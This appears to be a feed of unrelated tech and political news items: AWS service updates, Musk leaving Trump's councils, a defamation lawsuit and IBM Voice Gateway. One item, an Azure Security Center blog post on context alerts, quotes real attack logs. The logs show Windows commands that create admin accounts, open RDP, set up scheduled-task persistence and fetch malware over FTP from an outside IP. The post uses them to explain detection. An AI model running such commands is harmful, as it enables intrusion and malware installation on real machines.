Amazon Cloudfront, Amazon S3 Transfer Acceleration, AWS WAF, and AWS Shield are now HIPAA eligible

AWS has expanded its HIPAA Compliance Program to include Amazon CloudFront, Amazon S3 Transfer Acceleration, AWS WAF, and AWS Shield as HIPAA eligible Services. If you have an executed Business Associate Agreement (BAA) with AWS, you can now use Amazon CloudFront to accelerate the delivery of protected health information (PHI), Amazon S3 Transfer Acceleration for faster transfers of PHI to and from Amazon S3, AWS WAF to protect your web applications from common web exploits, and AWS Shield to safeguard your web applications running on AWS from Distributed Denial of Service (DDoS) attacks. Information on HIPAA eligible services on AWS can be found at our HIPAA Compliance page.
Quelle: aws.amazon.com

Elon Musk Quits Trump's Advisory Councils After President Pulls US From Paris Accord

Nicholas Kamm / AFP / Getty Images

Tesla and SpaceX chief executive Elon Musk is stepping down from several Trump administration advisory councils after the president announced on Thursday that the US will withdraw from the Paris climate agreement.

Musk, who sits on Trump's economic advisory council as well as a manufacturing group, threatened to quit on Wednesday, amid news reports that the president would pull the US from the climate accord, which has been ratified by 147 countries.

Musk, whose electric car company Tesla's stated mission is “to accelerate the world’s transition to sustainable energy,” is widely viewed as a clean energy luminary.

In February, Uber CEO Travis Kalanick stepped down from Trump's economic advisory council following backlash from customers and protests outside the ride-hail giant's San Francisco headquarters. Hours later, Musk said he would remain on Trump's advisory councils to “serve the greater good.

Some Tesla customers had canceled their Model 3 orders over Musk's relationship with Trump, BuzzFeed News reported in January.

In Paris at the COP21 climate conference in 2015, Musk called addressing climate change is “fundamentally is a government issue.”

“I think hopefully what comes out of the climate talks in Paris is that the governments of the world, they have to put their foot down and they say five years from now let's say, there has to be a huge change and that companies know for sure that this is going to happen,” he said.

Quelle: <a href="Elon Musk Quits Trump's Advisory Councils After President Pulls US From Paris Accord“>BuzzFeed

Azure Security Center adds Context Alerts to aid threat investigation

In two recent articles Greg Cottingham and Jessen Kurien described investigation processes triggered by a security alert. If you haven't already done so, please read “How Azure Security Center helps reveal a Cyberattack” and “How Azure Security Center detects a Bitcoin mining attack.” This post will make a lot more sense if you've read them. In these articles, the authors describe how background information from logs helped to provide a deeper understanding of the attack. Once understood, an appropriate set of remediation actions could be identified to block the security intrusion and prevent similar incidents reoccurring.

This kind of investigation process is often difficult for customers to replicate. It requires a lot of expertise to know what to look for. Most companies don’t have security experts like Greg and Jessen on their payrolls, and from all reports, they are very expensive to hire! The process is also time-consuming, often needing hours or even days of following hints, crafting and tweaking queries, and interpreting data in order to pinpoint the attacker’s activity.

To try to address this, we recently deployed a new type of alert. This alert automates some aspects of security investigation work and tries to deliver more relevant context to the customer about what else was happening on the system during and immediately before the attack. The context gathering is triggered whenever a security detection alert is reported. If any relevant context is found, it is reported in a follow-up “suspicious behavior” alert.

Example from Azure Security Portal

Let’s review one of these alerts to get a feel for what they contain and how they can help you get a fuller picture of the context surrounding a security alert. The context alerts have the snappy title, “Potentially suspect behavior reported as extra context for other alerts.”

The context alert shown above has been annotated with some explanation. It is showing the result of three separate context queries compiled into a time-ordered list of potentially interesting events near the time of the original alert.

Although we present the event data in summarized form, you may find it easier to see what is going on if you copy the contents of the CONTEXTEVENTACTIVITY field and paste into a text editor. For most process execution events you will see the following items in each line, the time that the process was run, process name, process command line, repetition times or count, and report category, typically "UnusualProcess" or "RDPLogon". The repetition field tells you if an identical event was repeated at a different time; if there are three or fewer repetitions the times are recorded, if more than 3 a simple count of repetitions is included.

Only a minority of alerts result in a context report. This is because we are explicitly looking for suspicious behavior and don’t create a report if we don’t find any. The types of behavior that we look for are unusual commands being executed and unusual patterns of execution. These are usually not sufficiently suspicious to trigger an alert in themselves but, in the context of a positive alert from one of our security detections, they can provide important corroborating evidence. When viewed alongside the originating alert they can give you a much fuller picture of what was happening during the attack.

How does it work?

As note earlier, when Azure Security Center alerts on a new detection the context service is triggered to try to answer some of the same questions a human investigator would ask about the alert. For example, "Were any other unusual processes run in this logon session?" or "Who recently logged on to this virtual machine?” Different data sources and jobs are chosen depending on the type of alert and the data items available in the alert. For example, if the alert contains user account details, we might use that to look up what else that was run in the same account session around the time of the alert. Any relevant data from these queries is output as a Suspicious Behavior context alert in Azure Security Center.

Case studies

Here is an example like the attack seen in Greg's earlier post. The context report was triggered by the alert “Detected suspicious use of Cacls to lower the security state of the system.” The resulting context report combines output from three different context jobs into a time-ordered set of events. Note that I’ve stripped out some of the detail to reduce repetition and make it easier to read.

Alert Description: "Related alert (dated 2017-04-21 09:37:47Z). 4 items in report (Unusual processes executed, RDP Logons, Supplemental processes executed, Unusual multi-processes commandline execution)",
ContextEventActivity:
00:47:44Z xxxxxxUser 175.143.245.210 (RDPLogon)
09:37:26Z "C:windowssystem32ftp.exe" -s:C:WINDOWSsystem32us.dat
09:37:32Z ftp -s:xpoffice.exe
09:37:32Z ftp -s:c:RECYCLERxpoffice.exe
09:37:33Z ftp -s:c:xpoffice.exe
09:37:45Z "C:WindowsSystem32net.exe" stop CryptSvc
09:37:45Z "C:WindowsSystem32regsvr32.exe" urlmon.dll shdocvw.dll jscript.dll vbscript.dll /s
09:37:45Z "C:WindowsSystem32cacls.exe" C:Windowssystem32wscript.exe /e /t /g SYSTEM:F
[removed some items for brevity]…
09:37:46Z "C:WindowsSystem32cacls.exe" C:Windowssystem32cscript.exe /e /t /g SYSTEM:F
09:37:46Z "C:WindowsSystem32cacls.exe" C:Windowssystem32iasias.mdb /e /t /g SYSTEM:F
09:37:46Z "C:WindowsSystem32net.exe" localgroup administrators abai$/add
09:37:46Z "C:WindowsSystem32net.exe" user www.401hk.com Www.401hk.com$
09:37:46Z "C:WindowsSystem32net.exe" user www.401hk.com/active:yes
09:37:46Z "C:WindowsSystem32reg.exe" ADD "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f"
[Report truncated…maximum number of items exceeded]

While not every event list may be related to the attack, in the above event trace we can see the following activities:

An RDP logon that in this case probably unrelated.
Unusual execution of scripted FTP commands.
Shutting down the Windows Crypto service.
Registration of scripting DLLs. These are not typically registered on a server, but are obviously needed by the attack.
Setting permissions on cscript and wscript executables.
Creating new user accounts.
Removing restrictions from Terminal Services (RDP) logons.

Sadly, at this point we run out of space to follow the full extent of the attack, but even from this snippet of 30 items, minus the ones deleted to save space, it is fairly clear that something unusual and unwanted is going on. A further final clue is the timing of these events. A whole series of otherwise unrelated processes executed within the same minute is a clear sign of a scripted attack.

This is another interesting variant of a similar attack pattern, with expletives edited out, based on an Unusual process execution detected alert.

11:44:09Z "C:WindowsSystem32regini.exe" c:windowssystem3225run.ini
11:44:09Z "C:WindowsSystem32regini.exe" c:windowssystem3225runq.ini
11:44:16Z "C:WindowsSystem32SecEdit.exe" /configure /cfg "C:WINDOWSsystem32NewAuto.inf" /db newdb.sdb /log logfile.txt /areas REGKEYS FILESTORE
11:44:16Z "C:WindowsSystem32SecEdit.exe" /configure /db secedit.sdb /cfg NewAuto.inf
11:44:16Z "C:WindowsSystem32SecEdit.exe" /configure /db secedit.sdb /cfg F***Gothin.inf
11:44:28Z "C:WindowsSystem32cacls.exe" cmd.exe /e /t /g system:f
11:44:28Z "C:WindowsSystem32cacls.exe" ftp.exe /e /t /g system:f
11:44:29Z "C:WindowsSystem32cacls.exe" net.exe /e /t /g system:f
11:44:29Z "C:WindowsSystem32cacls.exe" net1.exe /e /t /g system:f
11:44:29Z "C:WindowsSystem32cacls.exe" wscript.exe /e /t /g system:f
11:44:29Z "C:WindowsSystem32cacls.exe" cscript.exe /e /t /g system:f
11:44:49Z "C:WindowsSystem32net.exe" stop CryptSvc
11:44:50Z "C:WindowsSystem32regsvr32.exe" urlmon.dll shdocvw.dll jscript.dll vbscript.dll /s [Repeats: 11:44:50.82]
11:45:01Z "C:WindowsSystem32ftp.exe" -s:C:MG05.dll
11:45:02Z "C:WindowsSystem32schtasks.exe" /create /tn "45645" /tr "c:Ttqlhcjntzllto.exe" /sc minute /mo 1 /ru "system
11:45:03Z "C:Windowssystem32cmd.exe" /c net1 stop sharedaccess&echo open 222.184.79.11 > MG06.dll&echo mix>> MG06.dll&echo mix>> MG06.dll&echo binary >> MG06.dll&echo get Ttqlhcjntzllto.exe >> MG06.dll&echo bye >> MG06.dll&ftp -s:MG06.dll&p -s:MG06.dll&Ttqlhc….
11:45:03Z ftp -s:MG06.dll

This shows using regini.exe to perform bulk registry edits, using secedit.exe to change system security, and creating a scheduled to task, most likely to secure a permanent foothold on the machine. The last two lines show using cmd.exe redirection to create an ftp script and then executing the script to download a piece of malware, Ttqlhcjntzllto.exe. In the previous line, third from last, this executable is installed as a scheduled task. Although this appears to be out-of-order, this is because attack scripts are often run repeatedly to give them better chance of completing successfully so we're probably seeing a snapshot containing the beginning and end of two executions of this script.

What’s next

Although these reports already provide valuable context for an alert we will continue to refine this, expanding the kinds of data included and working on ways to make the output smarter.

To learn more

See other blog posts with real-world examples of how Azure Security Center helps detect cyberattacks — How Azure Security Center helps reveal a Cyberattack and How Azure Security Center detects a Bitcoin mining attack.
Azure Security Center detection capabilities — Learn about Azure Security Center’s advanced detection capabilities.
Managing and responding to security alerts in Azure Security Center — Learn how to manage and respond to security alerts.
Azure Security Center FAQ — Find frequently asked questions about using the service.

Quelle: Azure

A Pro-Trump Writer Just Sued A Fusion Reporter For Accusing Her Of Making A "White Supremacist" Gesture

A pro-Trump journalist and political activist sued a Fusion reporter in federal court in Washington, D.C. Thursday, the most serious action yet in the emerging conflict between mainstream news outlets and the insurgent conservative media that has set up shop in the nation’s capital.

In the complaint, shared with BuzzFeed News, lawyers for Cassandra Fairbanks allege that Emma Roller, the Fusion journalist, defamed their client when she tweeted an image of Fairbanks at the White House making what Roller claimed in a caption is a “white power hand gesture.”

Fairbanks is represented by Robert Barnes, a Malibu attorney best known for high profile clients such as Wesley Snipes and Ralph Nader. In the suit, Barnes pits “independent, outsider writers, scribes, advocates, and journalists… a new media” against an “increasingly distrusted elite-backed press.” Mainstream media organizations “view the First Amendment as a wholly owned property of elite-backed journalists to smear and slime their adversaries at will,” the complaint reads. “The First Amendment is meant to protect the Cassandra Fairbanks’ of the journalism world: independent, alternative voices of truth in a sea of fake news.”

At the time of the photograph at issue, Fairbanks was an employee of the Russian government-owned website Sputnik. Now she works for Big League Politics, a new, far-right politics site founded by a former staffer of Breitbart, the far-right news site previously run by Steve Bannon, President Trump’s controversial chief strategist. Fairbanks is among a crop of vigorously pro-Trump writers — along with Mike Cernovich (who posed next to Fairbanks in the image in question), the self-described “national security reporter” who promoted the Pizzagate conspiracy theory and Jack Posobiec, the writer and activist who planted fake “Rape Melania” signs at an anti-Trump demonstration — who have enjoyed proximity and access to an administration that sees few friends in the traditional press.

Since starting at Big League Politics earlier this month, Fairbanks has written stories that announced a series of rallies against sharia law and repeated a since-debunked claim about a popular pro-Trump conspiracy theory linking the murdered DNC staffer Seth Rich to Wikileaks. Her penultimate article for Sputnik was headlined “Resuming the Witch Hunt: Flynn Accused of Secretly Taking Payments from Russia.”

The rise of a group of nakedly partisan writers who promote conspiracy theories, fabricate rape threats, and have connections to extreme online communities, has caused consternation among the mainstream press. Roller’s April 28 tweet, which calls attention to Fairbanks and Cernovich making a hand gesture associated with the alt-right in the White House briefing room, comes out of this context.

Before it was deleted, Roller’s tweet was shared more than 6,000 times, sparking a discussion about the nature of hate symbols in the age of internet memes; it’s long been a stated goal of online communities such as 4chan’s /pol/ board to fool the mainstream press into reporting that anodyne gestures and images are the new swastikas.

“There was a troll meme going around saying that it meant white power,” Fairbanks told BuzzFeed News at the time of Roller’s tweet. “But it was a joke because Trump supporters are always being called Nazis even when it isn't true.”

Yet that very troll campaign could hamper Fairbanks' case, which will have to show that Roller knowingly or recklessly published false information. “If there was an active campaign to provide her disinformation and she was reasonable in relying on that information then that could certainly cut against liability,” Katie Townsend, litigation director of the Reporters Committee for Freedom of the Press, told BuzzFeed News.

The suit claims that Roller “acted with actual malice when she published the caption either with actual knowledge that the caption was not true or with reckless disregard as to its truth” and that the tweet caused Fairbanks to experience “extreme emotional distress.”

Roller, who learned of the lawsuit prior to its filing from BuzzFeed News, did not comment for the story.

The action comes at a time when lawsuits against journalists and media organizations have gained new stature. Technology entrepreneur and billionaire Peter Thiel funded a lawsuit against Gawker Media that ultimately caused the company to go bankrupt. And President Trump has repeatedly threatened to sue journalists and change libel law to be less favorable to the press.

“There are defamation cases designed to burden reporters or punish reporters for reporting on things that folks with some means may not want them to report on,” Townsend said. “We have concerns the purpose of such lawsuits is to chill speech.”

Fairbanks’ attorney Barnes told BuzzFeed News that he took the Roller case pro-bono “to send a message that people are here and listening.” Barnes received some publicity late last year when he won more than $500,000 on bets in Europe that Donald Trump would win the election.

“I’ve been disturbed by people using the leverage of institutional media to harass new media,” Barnes told BuzzFeed News. “I’ve been looking for the right case to help advocate for changing that.”

Quelle: <a href="A Pro-Trump Writer Just Sued A Fusion Reporter For Accusing Her Of Making A "White Supremacist" Gesture“>BuzzFeed

AWS Serverless Application Model (AWS SAM) Now Supports AWS X-Ray

The AWS Serverless Application Model (AWS SAM) has introduced AWS X-Ray support. You can now configure the X-Ray tracing mode for your Lambda functions within your SAM template. X-Ray helps you analyze and debug distributed applications. With X-Ray, you can identify the root cause of performance issues and errors in your Lambda functions. Learn more in our documentation.
Quelle: aws.amazon.com

Elasticsearch 5.3 now available on Amazon Elasticsearch Service

Your analytics and search applications can now benefit from support for Elasticsearch 5.3 and Kibana 5.3 in Amazon Elasticsearch Service. Elasticsearch is a popular search and analytics engine for log analytics, full text search, application monitoring, and more. Amazon Elasticsearch Service delivers Elasticsearch’s easy-to-use APIs and real-time capabilities along with the availability, scalability, and security required by production workloads. 
Quelle: aws.amazon.com

The cognitive future of customer service with IBM Voice Gateway

What’s the future of customer service? Your call center is frequently where your customers experience your company. So what can you do to make that experience as positive as possible?
In my last blog, I described how cognitive capabilities have transformed interactive voice response (IVR) systems. Cognitive IVR systems rely on artificial intelligence (AI) to understand and communicate with callers. The AI can be trained to detect the caller’s intent, speeding issue resolution. Because the system has been trained on language and acoustic models, it can understand many different voices and contexts. Speech-to-text and automatic speech recognition can handle domain-specific words and dialects.
Recently, IBM announced the IBM Voice Gateway. It essentially turns Watson into a cognitive IVR system. IBM Voice Gateway can be used to build virtual cognitive agents that communicate with customers using natural language. Through the orchestration of several cognitive services including Watson Speech to Text, Watson Text to Speech and Watson Conversation, the new IBM Voice Gateway provides a key integration point between cognitive self-service agents and your call center operations.
How does Voice Gateway accomplish this exactly? By enabling a callable session initiation protocol (SIP) application that can be connected to from a variety of sources, including SIP Trunks—for example, Twilio’s SIP Trunking service, Session Border Controllers or virtually any enterprise telephony device that communicates using the SIP protocol.
Think of Voice Gateway as a next-generation, cloud-native, standalone, cognitive IVR system. It includes features you would expect from a traditional IVR system, such as touch tone support and the ability to play music on hold. But beyond these traditional features, the solution makes it easy to develop virtual agents that understand natural language.
You may be wondering how Voice Gateway integrates with traditional IVRs that are programmed using voice XML from vendors like Avaya or Cisco. IVR systems are typically designed to support the ability to transfer out to other SIP endpoints like ACDs or specific SIP URIs. Voice Gateway is just another SIP application that you program into an existing IVR to transfer out to or conference into a call. You can also route directly into Voice Gateway from a SIP trunk or Session Border Controller.
One challenge to address is how to share context between IVR systems. For example, if a call starts in a traditional IVR that collects information from the caller, it may be necessary to share that information with the cognitive IVR system. With IBM Voice Gateway, you can share contexts through an exchange of metadata in the SIP signaling using the User-to-user (UUI) header. The metadata can contain the actual context or point to the data in a separate context store.
Callers want personalization, a key feature in next-generation call automation systems. Consumers expect that a company will remember their past interactions and use them to provide better customer support. IBM Voice Gateway is customizable through a Service Orchestration layer to modify responses to queries through systems of record APIs to add personalization capabilities.
Through IBM Voice Gateway with Watson services, you can bring next-generation call automation into your organization. You can drive down costs of running traditional IVRs and drastically improve your customers’ satisfaction.
Are you ready to get started? Register for the IBM Voice Gateway webcast on June 6th and discover how you can bring this cognitive call center solution to life in your organization.
The post The cognitive future of customer service with IBM Voice Gateway appeared first on Cloud computing news.
Quelle: Thoughts on Cloud